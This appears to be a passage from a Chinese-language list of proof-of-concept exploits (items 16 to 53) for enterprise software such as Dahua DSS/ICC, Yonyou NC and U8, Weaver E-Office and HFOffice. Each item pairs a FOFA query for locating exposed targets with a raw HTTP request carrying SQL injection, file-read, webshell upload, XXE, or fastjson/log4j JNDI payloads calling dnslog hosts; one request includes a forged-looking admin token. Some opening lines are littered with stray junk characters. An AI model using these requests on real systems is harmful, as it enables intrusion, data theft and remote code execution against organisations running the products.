  B2 N( o2 c! n# \3 g# O# D16.  红帆HFOffice医微云SQL注入
' u& }5 F, T% e! Q4 u; ]$ E1 qFOFA:title="HFOffice"8 F( Q% J+ p1 I# Z
poc中调用函数计算1234的md5值
1 c0 K2 }. B5 ^" V& \. I" L3 hGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.10 F3 G) d7 W( E9 r% h* k# C' j. I* B
Host: x.x.x.x' V8 ^0 H/ b& B- S: |6 X
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
' b8 O. e" I/ R9 j( c* jConnection: close! e3 Q5 G3 G4 Y7 b  y4 [" m
Accept: */*
4 w; C" _$ g0 s5 E- ~  w: G8 LAccept-Language: en
" A! P# P0 ?4 ~: _Accept-Encoding: gzip
# T/ w1 s/ M& H7 ?+ S' m. ?7 F% W; c% D2 g! j! N( {6 a. i+ b

- X5 [# L) S7 X6 r# [3 @) K17. 大华 DSS itcBulletin SQL 注入+ [, I" ]! t5 y6 t  M4 s/ D. `
FOFA:app="dahua-DSS"
9 _7 p" M# B, X1 ~3 K7 APOST /portal/services/itcBulletin?wsdl HTTP/1.1  {6 T+ O9 ^4 n: k3 B+ m) g
Host: x.x.x.x
9 e* Z1 D0 u0 ]& [1 e  |( oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 T' C1 h# V3 L0 ]& D0 h
Connection: close
8 K/ N% {4 [. O2 n% a0 CContent-Length: 345
# i- S2 ^2 L6 U4 d' b! D. JAccept-Encoding: gzip* L! e# y5 p: j" s; r" U- @1 |

" d2 ]  X2 c) }+ T5 n<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% y& `8 E* a1 @6 Z<s11:Body>( X3 l- N8 z$ a2 h. ?
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
  U6 N* D! h; w& Z      <netMarkings>
9 m+ e" W" E- D5 N2 [$ T3 J# I6 N       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1' \6 j2 B( Z: }& Q/ c
      </netMarkings>  a4 \! h! u. [$ m5 {& J
    </ns1:deleteBulletin>
" R7 |+ D/ B# r% ^, @+ ]  </s11:Body>0 G& [8 z- Q1 K. ^. A) V) f0 I
</s11:Envelope>, c) ~) H  k, Y, P4 ~2 B# k) S1 b
5 p# @# h9 }* ]7 @0 Z" I

! C0 p4 C" S- X, I$ U18. 大华 DSS 数字监控系统 user_edit.action 信息泄露! b% A8 L# ]; Q
FOFA:app="dahua-DSS": t' r$ G8 x1 `! t, I
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1- j$ @5 d2 J! T' Q4 {
Host: your-ip
  a$ b: h8 [4 F& a7 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, Y( f  m0 ~* ]+ ~" F( P. A! RAccept-Encoding: gzip, deflate
) {' T. p9 B# e; k3 lAccept: */*7 U; e& L1 V7 y( e/ N3 L0 B) r
Connection: keep-alive9 B1 W  x7 r8 w+ N( _3 I
4 d5 g0 n, r" z& @

% A. G/ T5 R" x1 g& Y4 e) C/ r$ U6 K! |: I* o7 Z7 ^7 M- j
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入2 C# ^( T8 Q% ^9 |: @0 ]
FOFA:app="dahua-DSS"$ P. P: _: D1 y$ T
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
- Y0 s# W" r* \9 o" eHost:
# P& r* g& H$ J9 z; ]2 g) OUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- e# R  Q$ p, \+ P4 [) ~
Accept-Encoding: gzip, deflate
' B2 ~: J4 E4 j! B/ E: lAccept: */*
* _4 V( C- Z5 [8 O9 z- qConnection: keep-alive; |: c3 S; Y& g( @! L

) n$ q. P$ _5 \' n4 |: {
/ f* E+ t8 h+ l1 R  r  ]+ e* Y20. 大华ICC智能物联综合管理平台任意文件读取
: ?* G" L1 I/ |) }FOFA:body="*客户端会小于800*"
3 a8 U) J" F, S, W& |GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 ]: d, F% b" O& r. K# oHost: x.x.x.x* X  W3 X" Q& u  m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: j# h' t- w' PConnection: close9 Y& r& c% U, e7 s( d' O5 h+ G2 q( C
Accept: */*3 \! M( P0 |' l7 e7 L# s
Accept-Language: en
1 e' ^  i9 e2 |& V& AAccept-Encoding: gzip
" }" {1 f" C$ Q6 z& e  e$ _! o5 _3 V' q: \* ?
' X6 a9 i: ]# t9 d" M* h
21. 大华ICC智能物联综合管理平台random远程代码执行
1 u1 P. w, q  qFOFA:icon_hash="-1935899595"8 Z% f; T9 Q0 V7 T. X
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1( I) |) c  k! N2 f9 w9 K
Host: x.x.x.x* ^, F8 ~7 t% {5 K  l$ D- t; U. i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 `3 ?8 s: G. B5 S- F8 zContent-Length: 161
& `. W  q& Z$ Z5 _) iAccept-Encoding: gzip8 G- n+ J1 t% X) }6 U- T: A
Connection: close
' ]& [+ O# I4 k" `5 w: w  h; _Content-Type: application/json;charset=utf-8; j; D  Q7 l  n+ Q1 I- Q# p
/ w' B+ c! R8 W6 ]
{7 a& Q# B" p6 t) G* K
"a":{: _" a9 B; \* W$ s- y( W
   "@type":"com.alibaba.fastjson.JSONObject",
) O  y& x' L! I. f2 u  f" h, J" {7 p    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
/ x8 f- B6 p* I. N8 I& d  }""" l  D, _! a  H! S4 G
}! X. l) E" C- R  @7 M/ ~1 p: ]

  Z( Z3 M+ e% a: p. |7 N3 _% E; O0 H1 S3 R; @+ A
22. 大华ICC智能物联综合管理平台 log4j远程代码执行% y: `9 t3 a; d
FOFA:icon_hash="-1935899595"; Z* q" r% {" ^0 h  d* w- W
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1; {7 `8 r6 k8 d% Z% A0 S! [9 X) u' y
Host: your-ip* ]1 `4 [2 h# U  P, I  v- G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! A1 S5 N! S4 ~$ V' tContent-Type: application/json;charset=utf-8
, z1 Q' V/ L5 T$ y* Z3 ~: G
; y9 J* n6 Y- g  I3 y! A{  _9 g. r6 N5 B2 C' |
"loginName":"${jndi:ldap://dnslog}"
$ i) S$ Q2 d4 [6 Z' q- C' z}
6 o+ H) ]# U7 q! {
8 k" C/ Q: j& r/ s) o7 ]
/ [# C/ t' {( x6 D  G8 |6 c: c  c8 g- {; \0 w9 m' Q
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行! }5 y6 N7 a6 n: x( ]/ S+ m' Q
FOFA:icon_hash="-1935899595"
  }) b, U+ W  Q1 BPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1+ V& {3 W! @6 T. U# \: I5 B0 K
Host: your-ip( A3 d' q( B' o% ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  `5 u* a. F( S0 z
Content-Type: application/json;charset=utf-8
# t% M7 r+ Y: i9 MAccept-Encoding: gzip3 x/ f) N# k* V  a. @7 |
Connection: close& T; T$ ^- i* s/ i+ N

! ^. o3 m, y4 d) o9 J) b+ p{$ D1 L* B% U" n+ T4 Z  E  v! M, ]
    "a":{  M* K: t7 Y$ ^# x/ h" b" w' {' Z
        "@type":"com.alibaba.fastjson.JSONObject",
6 {& U; T+ o' }& _* {3 I: \. X       {"@type":"java.net.URL","val":"http://DNSLOG"}2 j9 B0 A1 J' E: j
        }""* ?2 b9 S8 V( G- Y2 |0 s1 o
}# v1 e" d5 ?5 v; C) Q# P
! k* Z2 W' m8 m$ i+ @/ I5 g# [
5 h+ S7 m0 ~1 [
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业 ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
